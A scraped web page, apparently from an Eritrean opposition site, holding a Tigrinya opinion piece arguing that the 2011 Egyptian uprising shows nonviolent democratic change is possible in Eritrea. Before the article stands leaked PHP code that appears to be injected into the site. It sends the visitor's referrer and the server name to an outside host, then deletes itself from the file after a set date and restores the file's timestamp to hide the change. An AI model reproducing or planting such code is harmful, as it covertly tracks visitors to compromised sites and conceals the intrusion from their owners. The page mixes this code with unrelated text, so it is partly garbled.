check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ናይ ለውጢ ማዕበል ካብ ግብጺ
кремлевская диета

ናይ ለውጢ ማዕበል ካብ ግብጺ

User Rating: / 2
PoorBest 

 

 

 

ናይ ለውጢ ማዕበል ካብ ግብጺ

ሙኒር አሕመድ

ግብጺ ሓንቲ ካብተን አዚየን ጥንታውያን ሃገራትን፡ ናይ አሽሓት ዓመታት ስልጣኔ ዘለዋ፡ አብ አፍሪቃን ኤስያን ከአ ከም አብነት እትጥመት ሃገር ምዃና ኩሉ ዝሰማማዓሉ ሓቂ እዩ። ይኹን ደአምበር፡ ፖሎቲካውን ቁጠባውን ባህላውን ጽልዋ ግብጺ አብቲ ፖስት ኮሎኒያል ዝበሃል መዋእል አይከም ታሪኻዊ ግዲአን፡ ምስቲ ትጽቢት ህዝባን ህዝቢ’ቲ ከባብን ከአ አይዳረግን። ናይዚ ቀንዲ ምኽንያት ከአ፡ እቲ ንነብሱ ከም ግብጺ ዝርኢን፡ ብዘይካ ስልጣኑን ረብሓ ውሑዳት መራሕቱን ምሕላው፡ ካልእ አጀንዳ ዘይብሉ፡ ጸቢብ ናይ ረብሓ ጉጅለ ኮይን’ዩ ጸኒሑ። ንልዕሊ ስሳ ዓመታት ከአ ክገዝእ ጸኒሑን አሎን። ከም ኩሎም መለኽቲ ስርዓታት ከአ፡ዋላውን አብግዜ አፈርክቡ እናሃለወ፡ ንዓይ እንተተንኪፍኩም፡ ብድሕረይ ዝብኢ ክበልዓኩምዩ እናበለ ንህዝቢ ከፈራርሕ ይርከብ። ህዝቢ ከአ እሱር ናይ ዝኸፈአ ስግአታቱ ዝኾነሉ ኩነታት ፈጢሩ።

እዚ ስእሊ’ዚ ግን ሓንሳብን ንሓዋሩን ክቕየር ብዓይንና እነሆ ንርእዮ አለና። ናይ ፕረሲደንት ሙባራክን መሻርኽቱን ካብ ስልጣን ምውራድ ብዘየገድስ ከአ፡ ግብጺ ብድሕሪዚ ታሪኻዊ ህዝባዊ ናዕቢ ፈጺማ አብ ዝነበረቶ ኩነታት አይክትምለስን እያ። እቲ ዘየምልሳ ኸአ፡ እቲ በብመዓልቱ በቲ መላኺ ስርዓት ዝግበር ዘሎ ሕድገታት ዘይኮነስ፡ እቲ ህዝበ ግብጺ ዘርአዮን የርእዮ ዘሎን ነፍሰ ተአማንነትን ብማዕሪኡ አብቲ ስርዓት ዝፈጠሮ ፍርሕን ራዕድን እዩ። እዚ ድማ ነቲ ብሕጂውን አብ ስልጣን ክመጽእ ዝሸባሸብ ዝኾነ ይኹን ሓይሊ ዓቢ ትምህርቲ ክኸውን’ዩ። ህዝቢ አይፋልን ደጊም የአኽለኒ ኢሉ እንተ ተላዒሉ እምበአር ዝዓግቶ ሓይሊ ፍጹም የልቦን።

አብ ግብጺ ጥራይውን ተሓጺሩ ዝተርፍ አይኮነን። እቲ ብመንእሰያት ቱኒዝያ አብ ዝሓለፈ ወርሒ ሕዳር ዝጀመረ ሰውራዊ ማዕበል፡ ሎሚ ንግብጺ ክቕይራ ይርከብ፡ ድሮውን አብ የመን፡ ጆርዳን፡ አልጀርያ፡ ከምኡውን አብ ካልኦት ሃገራት በጺሑ ይርከብ። ትማሊውን፡ አብ ሕብረት ሶቭየትን መላእ ምብራቕ ኤውሮጳን ከምኡ’ዩ ኔሩ። ብፖላንድ ጀሚሩ ከአ ምልኪ ካብ መላእ ኤውሮጳ ክሳብ ዝቕንጠጥ አየዕረፈን። እቲ ምንታይ፡ሕቶ ጭቁናት ህዝብታት ወትሩ ሓደ ስለዝኾነ እዩ። ንሱ ከአ ግዝአት ሕጊ ክነግስ፡ ህዝቢ ጎይታ ስልጣን ባዕሉ ክኸውን አለዎ። ከምኡ እንተዘይኮይኑ ኸአ፡ ወትሩ ግዳይ ገለ ውሑዳት ንሕና ኢና ረብሓ ህዝቢ ንፈልጥን ንሕልውን ዝብሉ ኮይኑ ክነብር እዩ። ታሪኽ አህዛብ ከምዝምህረና ግን፡ ሓለይቲ መሲሎም፡ ሃብቲ ካብ ምድላብ ሓሊፎም፡ ክሳዕ ዝኾነ ዝኸውን ከአ አብ ልዕሊ ህዝቢ ሰይሰይ ካብ ምባል ካልእ ዋኒን ፍጹም ከምዘይብሎምን ሃሊዎም ከምዘይፈልጥን ታሪኽ በብግዚኡ ክምህረና ጸኒሑን ገና ይምህረናን አሎ።

ምስዚ ኩነታትዚ ተዛሚዱ ዝመጽእ እሞ ደአ አብ ኤርትራኸ ተመሳሳሊ ኩነታት ክፍጠር ይኸእልዶ ይኸውን ዝብል ሕቶ፡ ሎም ቅነ፡ ሕቶ መብዛሕቲኦም ኤርትራውያን ኮይኑ ይርከብ። እቶም ዝበዝሑ፡ ይኸውንዩ፡ ክኸውንውን አለዎ፡ ቀልጢፉ ንክኸውን ግን ንሕና ኤርትራውያን አቐዲምና ክንገብሮም ዘለዉና ነገራት አለዉ። መጀምርያ ለውጢ ብዘይጎነጽ ከምዝከአል አሚንና ክንሰርሓሉ ይግባእ። ብድርሕርዚ ከአ፡ ናውቲ ዘይጎነጻዊ ቃልሲ እንታይ ምዃኖ አለሊና፡ ምስ ኩነታት ኤርትራ አዛሚድና፡ ኤርትራዊ ናይ ለውጢ ስትራተጂ ክንⷅይስ ይግባእ። ልከዕ’ዩ፡ አብ መንጎ ግብጽን ኤርትራን፡ አብ መንጎ ቱኒዝያን ኤርትራን፡ አቅሊልካ ዘይረአዩ ፍልልያት አለዎ። ሓደ ካብቲ ንኤርትራ ዝፈልያ ከአ እቲ ብተዛማዲ አብዘን ሃገራት እዚአተን ዝጸነሐ ዝሓሸ ፖለቲካዊ ሃዋህው እዩ። ይኹን ደአምበር፡ እቲ ሎሚ አብ ኤርትራ ሰፊኑ ዝርከብ ናይ ፍጹም ምልኪ ኩነታት፡ አብ ምብራቕ ኤውሮጳ’ውን ኔሩ እዩ። ህዝቢ ይአክል ደጊም ኢሉ ምስ ተበገሰ ግን ዝዓግቶ ሓይሊ አይነበረን። ጸኒሑ ደአ ብዕቡዳት ወተሃደራት ተሰሪቑ እንበር፡ አብ ኢትዮጵያውን አብ 1974 ተራእዩ እዩ። እቲ ብተማሃሮ ዝጀመረ ህዝባዊ ናዕቢ ቅሩብ ከይጸነሐ አብ ኩሉ ክፋላት ህዝቢ ኢትዮጵያ ብዘደንቕ ቅጽበት ተዘርጊሑ ነቲ አብ እዋኑ መን ካማይ ዝብል ዝነበረን፡ ቀንዲ መሓዛ ምዕራብ ዝነበረን ስርዓት ሃጸይ ስላሴ ነበረያ ነበረ ገይሩዎ።  አብ ሱዳንውን አብ 1964 ከምኡውን 1985 ተራእዩ። ህዝቢ ሱዳን፡ ብዘይ ጎነጽ፡ ኣብ ውሽጢ ዕስራ ዓመታት ንኽልተ ወታሃደራውያን ስርዓታት ከዝምብርከኹ ብምግባሩ አብ ዓለም ብዙሕ አድናቖት ረኺቡ’ዩ።

አብ ኤርትራ ደአ ስለምንታይ ክረአ ዘይክእል? ዘይከአል እንተኾይኑ ደአ እቶም ንለውጢ ንቃለስ አለና በሃልቲ ብኸመይ ደአ ለውጢ ከምጽኡ ይሓስቡ? ገለ ካብቶም ለውጢ ብውሽጥን ብዘጎነጽን አይከአልን’ዩ እናበሎ ዝሰብኩና፡ ብጎረቤት ሃገር ክግበር አለዎ ከአ ይብሉና። ለውጢ ብኮንትራት ደአ ካብ መዓስ ይግበር? እንተ ተገይሩኸ፡ ለውጢ ድዩ ወይስ ካልእ’ዩ ሽሙ? ካብዚ ዝገደደ’ውን አሎ። አብ ውሽጢ ሓይሊ ተቓውሞ መሕብኢ ረኺቦም ንፍሉይ አጀንደኦም ክሰርሑ ዝጸነሑ፡ ኩነታት ኤርትራ በቲ ዘይተጸበናዮ አቕጣጫ ክኸይድ ምስጀመረ ዝጀመርዎ፡ ሕጂ’ውን ደጋጊሞም ዝብሉዎ ነገር’ውን አሎ። ብዓንቶᎇኡኳ ኤርትራ  ነጻ ሃገር ክትከውን አይነበራን፡ዘኽውን ኩነታት የብላን፡ ኤርትራዊ ዝበሃል መንነት እውን የልቦን፡ ገድሊ ጊጋ’ዩ ኔሩ ወዘተ ይብሉና። ክምዚ ካብ ዝብሉና ሸነካት ደአ ንመፍትሒ ዝኸውን ሓሳባት ከመይ ጌርና ንጽበ? ንሓደ አን ሳር ሓያላት ብባዕላዊ ዕቕምታቱ ተቓሊሱ ዓወት ዝጨበጠ ህዝቢ ከይ ኢልካ ከምዚ ይበሃል? ብሓቂ ዝገርም ድፍረት። እንተ እቶም ካልኦት ደለይቲ ለውጢ ግንከ ብሓይሊ ብረት ጥራይ እዩ ክመጽእ ዝኽእል ኢሎም ዝአምኑ፡ምልክት ናይቲቲ ብረታዊ ተጋድሎና ዝገደፎ ስንብራት ካብ ምዃን ሓሊፉ ካልእ ሳይንሳዊ መርትዖ የብሉን። ስለዚ ኸአ እዩ ንዲሞክራስያዊ ለውጢ ምስ ወተሃደራዊ ዓወትን ምⷅይያር ውልቀ ሰባት ዘዛዝምዶ።

እቲ ዘገድስ እቲ ዝበዘሐ ክፋል ህዝብና አይፋልን፡ ይከአልዩ እዩ ዝብል። ሕቶ ህዝቢ ኤርትራ ካብ ናይዘን ሃገራት እዚአተን ዝፍለ የብሉን ጥራይ ዘይኮነስ፡ ለውጢ ናብ ሓቀኛ ደሞክራሲ ንክኸውን፡ ዝሓሸ አማራጺ የልቦን። ልክዕ ከምቲ ካብ ሰውራ ፈረንሳ ጀሚሩ፡ አብ ኤውሮጳን አሜሪካን ዝተረጋገጸ፡ ሕጂውን አብ ማእከላይ ምብራቕ ንርእዮ ዘለናን ታሪኽ ዘረጋግጾን፡ ህዝቢ ወናኒ ቃልሱ እንተኾይኑ ጥራይ እዩ ወናኒ ስልጣን ዝኸውን። ንሱ ከአ እዩ ል ዑላውነት ህዝቢ ማለት፡ ንሱ ከአ እዩ ደሞክራስያ። እቲ ኻልእ ብመስርሕ እናዓበየን እናዓኾኸን እናማዕበለን ዝኸይድ እዩ።

ካብዚ ዝተፈልየ መገዲ፡ ዋላውን ካልእ ጣጣ እንተዘየስዓበ፡ለውጢ ናይ ውልቀሰባት ደአምበር ለውጢ ናይ ኩነታት ክኸውን ተኽእሎ የብሉን። ነዚ ጐዕዙዚ ኸአ ህዝቢ ኤርትራ ክሳብ ሎሚ አይተከተሎን፡አይኽተሎን’ዩ ከአ። እቲ ምንታይ፡ዝኾነ ብዘይ ፍቓዱን ድልየቱን ዝግበር ዘይሕጋዊ ናይ ስልጣን ምⷅይያር፡ከም ናቱ ለውጢ ስለዘይርእዮ።

 


Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشرSecurity code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player